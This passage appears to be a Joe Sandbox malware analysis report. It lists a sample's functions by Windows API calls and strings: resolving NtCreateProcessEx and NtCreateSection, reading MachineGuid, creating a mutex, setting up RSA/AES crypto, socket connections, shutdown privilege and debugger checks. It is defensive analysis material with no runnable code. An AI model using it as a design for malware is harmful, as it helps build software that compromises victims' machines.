EnterCriticalSection.KERNEL32(0109A090), ref: 01097FD1
GetProcessHeap.KERNEL32(00000008,?), ref: 01098038
HeapAlloc.KERNEL32(00000000), ref: 0109803F
GetProcessHeap.KERNEL32(00000008,?,?), ref: 0109804A
HeapReAlloc.KERNEL32(00000000), ref: 01098051
LeaveCriticalSection.KERNEL32(0109A090), ref: 010980A8

Part of subcall function 01095FB0: GetModuleHandleW.KERNEL32(ntdll), ref: 01095FCD
Part of subcall function 01095FB0: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 01095FE1
Part of subcall function 01095FB0: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 01095FEC
Part of subcall function 01095FB0: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 01095FF7
Part of subcall function 01095FB0: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 01096002
Part of subcall function 01095FB0: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 0109600D
Part of subcall function 01095FB0: GetTempPathW.KERNEL32(000000F6,?), ref: 01096026
Part of subcall function 01095FB0: wnsprintfW.SHLWAPI ref: 01096061
Part of subcall function 01095FB0: PathCombineW.SHLWAPI(?,?,?), ref: 0109607B
Part of subcall function 01095FB0: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 010960A2
Part of subcall function 01095FB0: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 010960C6
Part of subcall function 01095FB0: SetEndOfFile.KERNEL32(00000000), ref: 010960C9
Part of subcall function 01095FB0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 010960D6
Part of subcall function 01095FB0: wnsprintfW.SHLWAPI ref: 010960F4

GetProcessHeap.KERNEL32(00000000,?), ref: 010980C7
HeapFree.KERNEL32(00000000), ref: 010980CE

Strings

Start, xrefs: 01097F75
%d|%s|%.16s|, xrefs: 01097CC1
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 01097C70
%s|%s, xrefs: 01097CF3

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
API String ID: 851647271-3778496198
Opcode ID: 363570388c7a0f5ef070239fe8c44df4fafe56a7fa7b83849c0ea76602edf16d
Instruction ID: f27e5293c54002ff862420fea465a386b4277266945f9692f60ee27212d12843
Opcode Fuzzy Hash: 363570388c7a0f5ef070239fe8c44df4fafe56a7fa7b83849c0ea76602edf16d
Instruction Fuzzy Hash: EEE11672B142568FEF698F68C4707BD7BE2BF85300F1881ADD9C597246DB358841EB90

Function 010986D0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 121encryptionfilesynchronizationCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(0109A090), ref: 010986F2

Part of subcall function 01097180: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 010971AA
Part of subcall function 01097180: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 010971C6
Part of subcall function 01097180: GetProcessHeap.KERNEL32(00000008,?), ref: 010971D9
Part of subcall function 01097180: HeapAlloc.KERNEL32(00000000), ref: 010971E0
Part of subcall function 01097180: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 010971FD
Part of subcall function 01097180: RegCloseKey.ADVAPI32(80000002), ref: 01097209

GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0109871F
StringFromGUID2.OLE32(?,?,00000080), ref: 01098778
wsprintfA.USER32 ref: 0109878F
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 010987A3
GetLastError.KERNEL32 ref: 010987AE
ExitProcess.KERNEL32 ref: 010988B3

Part of subcall function 01092690: GetTickCount.KERNEL32 ref: 01092692

WSAStartup.WS2_32(00000202,?), ref: 010987EC
CryptAcquireContextA.ADVAPI32(0109A4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 01098805
CryptAcquireContextA.ADVAPI32(0109A4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 01098821
CoInitializeEx.OLE32(00000000,00000000), ref: 0109886C
ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 01098883
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 010988A2

Strings

%temp%\%paths%, xrefs: 0109887E
C:\, xrefs: 0109871A
Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 010987F9, 01098816

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 267019445-2941900213
Opcode ID: 420f4f4daf63dca59812eb4f6a472212f2443f9befd1f5d9575f24cacbc758f1
Instruction ID: 314c1fa775fb7cb61aaef8ed0b716bed4c48a5c66a4001dca63be0d962a836fc
Opcode Fuzzy Hash: 420f4f4daf63dca59812eb4f6a472212f2443f9befd1f5d9575f24cacbc758f1
Instruction Fuzzy Hash: C141E970740309EFEB24DB50ED2AFA937B8FB44710F104069F284EA185EBB556449B65

Function 010986B4 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 129encryptionfilesynchronizationCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(0109A090), ref: 010986F2

Part of subcall function 01097180: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 010971AA
Part of subcall function 01097180: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 010971C6
Part of subcall function 01097180: GetProcessHeap.KERNEL32(00000008,?), ref: 010971D9
Part of subcall function 01097180: HeapAlloc.KERNEL32(00000000), ref: 010971E0
Part of subcall function 01097180: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 010971FD
Part of subcall function 01097180: RegCloseKey.ADVAPI32(80000002), ref: 01097209

GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0109871F
StringFromGUID2.OLE32(?,?,00000080), ref: 01098778
wsprintfA.USER32 ref: 0109878F
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 010987A3
GetLastError.KERNEL32 ref: 010987AE
ExitProcess.KERNEL32 ref: 010988B3

Part of subcall function 01092690: GetTickCount.KERNEL32 ref: 01092692

WSAStartup.WS2_32(00000202,?), ref: 010987EC
CryptAcquireContextA.ADVAPI32(0109A4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 01098805
CryptAcquireContextA.ADVAPI32(0109A4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 01098821
CoInitializeEx.OLE32(00000000,00000000), ref: 0109886C
ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 01098883
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 010988A2

Strings

%temp%\%paths%, xrefs: 0109887E
C:\, xrefs: 0109871A
Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 010987F9, 01098816

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 267019445-2941900213
Opcode ID: e4da71bc6332066cd3a239cbdc0f0cd484ab969f1e2363b0ec131d5e58a47e99
Instruction ID: d933b58a7231190a8c26d2f2c4cd29cbbee627b46ef2f2932a4679f4bbfb5fd8
Opcode Fuzzy Hash: e4da71bc6332066cd3a239cbdc0f0cd484ab969f1e2363b0ec131d5e58a47e99
Instruction Fuzzy Hash: 9B51F770740309EFEB24DB60EC2AF9937B4FB45710F1040A9F684EE185E7B545448B95

Function 01097550 Relevance: 22.6, APIs: 15, Instructions: 131memorynetworkthreadCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 01097563
htons.WS2_32(?), ref: 0109756E
socket.WS2_32(00000002,00000001,00000006), ref: 01097586
connect.WS2_32(00000000,?,00000010), ref: 010975A4
recv.WS2_32(00000000,?,00000002,00000000), ref: 010975BC
GetProcessHeap.KERNEL32(00000008,00000024), ref: 010975DD
HeapAlloc.KERNEL32(00000000), ref: 010975E0
CreateThread.KERNEL32(00000000,00000000,Function_000063F0,00000000,00000000,00000000), ref: 0109765B
CloseHandle.KERNEL32(00000000), ref: 01097666
recv.WS2_32(00000000,?,00000002,00000000), ref: 0109767E
closesocket.WS2_32(00000000), ref: 0109768D
GetProcessHeap.KERNEL32(00000000,?), ref: 01097696
HeapFree.KERNEL32(00000000), ref: 01097699
GetProcessHeap.KERNEL32(00000000,00000000), ref: 010976B3
HeapFree.KERNEL32(00000000), ref: 010976B6

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
String ID:
API String ID: 2784442062-0
Opcode ID: 1f97c443db5f3f322a401ab36daa4636479e6ffa7a5c8bc39bbc8e13736c0f39
Instruction ID: 65a019991ffc442bed84dd34e4074a51628fa8aeb93bad74cc6edeaa7ae0bbc2
Opcode Fuzzy Hash: 1f97c443db5f3f322a401ab36daa4636479e6ffa7a5c8bc39bbc8e13736c0f39
Instruction Fuzzy Hash: 5D410275A00345AAEB304F78AC69FAB7FA8BF48720F040199FAC1DB182D7759441DBE4

Function 010992B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86memoryencryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(00000020,?), ref: 010992C8

Part of subcall function 01092830: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,01099315,00000000), ref: 01092852
Part of subcall function 01092830: HeapAlloc.KERNEL32(00000000,?,?,?,?,01099315,00000000), ref: 01092859

GetProcessHeap.KERNEL32(00000000,00000000), ref: 01099325
HeapFree.KERNEL32(00000000), ref: 0109932C
wsprintfA.USER32 ref: 0109935F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01099398
HeapFree.KERNEL32(00000000), ref: 0109939B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 010993A0
HeapFree.KERNEL32(00000000), ref: 010993A3

Strings

%d|%s|%s|%s, xrefs: 01099359
4jdmhuQI, xrefs: 01099347

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocCryptRandomwsprintf
String ID: %d|%s|%s|%s$4jdmhuQI
API String ID: 4113358155-2151915281
Opcode ID: bc9f3ad5d0dd3a286bc3e12f271f0d2c5b42ad3c27615a81e48032ac9971ab1f
Instruction ID: 7d2064b3e55f3a524bb850fbaeadc82cdfd91fee73b8896ce9388f91c66c7d2b
Opcode Fuzzy Hash: bc9f3ad5d0dd3a286bc3e12f271f0d2c5b42ad3c27615a81e48032ac9971ab1f
Instruction Fuzzy Hash: 3D212BB1B003087BEF20A7A5AC26FEF7B6CEF84714F040154FA89AB1C5E9259915D7B1

Function 01096350 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 0109635D
OpenProcessToken.ADVAPI32(00000000), ref: 01096364
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 01096379
CloseHandle.KERNEL32(?), ref: 01096386
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 010963B0
CloseHandle.KERNEL32(?), ref: 010963BB

Strings

SeShutdownPrivilege, xrefs: 01096372

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 158869116-3733053543
Opcode ID: 3d003c102de091644cf23540f18ddb2c67daae67f314914a5b7e1e8074962df8
Instruction ID: 0213fff0e029fee3bc9a5a021461e531c050f835f273ab6a606b0009b0d4b983
Opcode Fuzzy Hash: 3d003c102de091644cf23540f18ddb2c67daae67f314914a5b7e1e8074962df8
Instruction Fuzzy Hash: C4018F71A40208EBEF209BE4AD0EFEE7BBCFB04711F104095F944A6180D7764A149BA1

Function 0015993E Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 001599D9
FindNextFileW.KERNEL32(00000000,?), ref: 00159A54
FindClose.KERNEL32(00000000), ref: 00159A76
FindClose.KERNEL32(00000000), ref: 00159A99

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: b57b9216b28b4012c65b50b43925a37b5723360e5117930cc740e02598420841
Instruction ID: a6352ba1c15c99bcf534a71b39a6ee2101a3c63a16b834bd251552a46869e9f9
Opcode Fuzzy Hash: b57b9216b28b4012c65b50b43925a37b5723360e5117930cc740e02598420841
Instruction Fuzzy Hash: D841A871A00529EFDF20DF64DC8D9AEB7B9EB85306F104195E829DB144E7709E88CB61

Function 00154E89 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00154E95
IsDebuggerPresent.KERNEL32 ref: 00154F61
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00154F7A
UnhandledExceptionFilter.KERNEL32(?), ref: 00154F84

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bcdc92871c6bafacab9bd86d39085c1d8f551c4630adb75a6ec66f499925a23f
Instruction ID: 2d3488510eb7fbae6b6f39a3a6ae0104e335883eb5c0c3a963f31b49f391e88f
Opcode Fuzzy Hash: bcdc92871c6bafacab9bd86d39085c1d8f551c4630adb75a6ec66f499925a23f
Instruction Fuzzy Hash: 8831D675D05218DBDB21DFA4DD497CDBBB8AF08305F1041AAE81CAB290EB719B888F45

Function 001576CB Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001577C3
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001577CD
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001577DA

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f8e80ce788db1207e4a113ab8a637b63622fb337fff2ff8ebad543d5c33c02a5
Instruction ID: 6ab52d1392ecba28f041e44e1d84d74fc8805b09686822f6a8035292c7f8a0bf
Opcode Fuzzy Hash: f8e80ce788db1207e4a113ab8a637b63622fb337fff2ff8ebad543d5c33c02a5
Instruction Fuzzy Hash: D431A47491121CEBCB21DF64DD8979DBBB8BF18311F5041DAE82CAA290E7709B898F44

Function 0015FBC1 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0015FBBC,?,?,00000008,?,?,0015F7BF,00000000), ref: 0015FDEE

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 6699b79528704ac9e4b762fb911eb6814a445d0c89d72945b5561266773d3fb8
Instruction ID: f4b74087899f628ba795db9f05d5309b020fb8f35ec5065139abdc4f5bb040c0
Opcode Fuzzy Hash: 6699b79528704ac9e4b762fb911eb6814a445d0c89d72945b5561266773d3fb8
Instruction Fuzzy Hash: 64B13A31510608DFD719CF28C48AB647BA1FF45366F26866CECA9CF2A2C335D996CB40

Function 00155125 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0015513B

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 61eb2c024791c9cea42fbda7cef9d1546da1acbc23d5c0b8ed24c47be1284682
Instruction ID: 78201946d69e241843faa2591c4fc794810519a7991908a458d1e007ac6b5861
Opcode Fuzzy Hash: 61eb2c024791c9cea42fbda7cef9d1546da1acbc23d5c0b8ed24c47be1284682
Instruction Fuzzy Hash: 905169B1909A15CBDB14CF98DDD17AABBF1FB48309F24806AD821EF650D3B49A84CF50

Function 01092690 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 01092692

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 5f180ecc7513154e70ec6bd00d0426182167aa8c226eb61c155ad297768e7dc8
Instruction ID: 435e0db7e26a5f9503c93d382b6f1b7c24624031e8aa37240065287c0df1c463
Opcode Fuzzy Hash: 5f180ecc7513154e70ec6bd00d0426182167aa8c226eb61c155ad297768e7dc8
Instruction Fuzzy Hash: 38318E32311411CBCB6CCE2CE8B5A6977E2B789320B194529D99AC72C9D73AE802CB44

Function 00155016 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005022,0015482B), ref: 0015501B

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8dedf664292a6d002e3874a2ce6ab83599abdf66e3a549459fea04710289f7d5
Instruction ID: 2ba8e5938588f4006acffd3e789c64db49d0c361323c465511ba9014e04dcaa8
Opcode Fuzzy Hash: 8dedf664292a6d002e3874a2ce6ab83599abdf66e3a549459fea04710289f7d5
Instruction Fuzzy Hash:

Function 010976F0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

0, xrefs: 01097750

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b23b60360416ddcb715adcdecc1b8f3953d08bca1481c9cc4884095518749088
Instruction ID: 8e317b8e115ba844f136e6290360d2d2f2d6cb3a7cff7968765c34e4ceeab1ab
Opcode Fuzzy Hash: b23b60360416ddcb715adcdecc1b8f3953d08bca1481c9cc4884095518749088
Instruction Fuzzy Hash: E851C531E143D84EDF1D8BED58602FDBFB19F56200F5841BED8D5AB642C5344A09CB61

Function 0015B779 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0015B779

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: d731cc865410fdb59f3183ab67dc1e5b1ee1774501fb9d553980f4b6258061cd
Instruction ID: 7d8ee0f68911bc03bdf1ee3ac4282dd4c149919c6c58e5a2e50b8cf6ec4e9170
Opcode Fuzzy Hash: d731cc865410fdb59f3183ab67dc1e5b1ee1774501fb9d553980f4b6258061cd
Instruction Fuzzy Hash: 44A02430300101CF4340CF355F0531D35FC57015D13004014D404C0430DF7040C04F01

Function 010947B0 Relevance: .8, Instructions: 750COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b678e1e5cadbc279f30897db864cd64de87305a752ae210852434c5fb4679b8f
Instruction ID: 2bedd3f9cdfb31d334da9f7fe6fce273722801165721319b08c79019e68eb5e6
Opcode Fuzzy Hash: b678e1e5cadbc279f30897db864cd64de87305a752ae210852434c5fb4679b8f
Instruction Fuzzy Hash: 7E724C3582919A8EDF5CEB64D9746EC7B34BF22300F8401FDC48A56566EF311A89EF60

Function 010943B0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51

Function 010980E0 Relevance: 61.6, APIs: 21, Strings: 14, Instructions: 350
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 01098106
GetTickCount64.KERNEL32 ref: 01098114

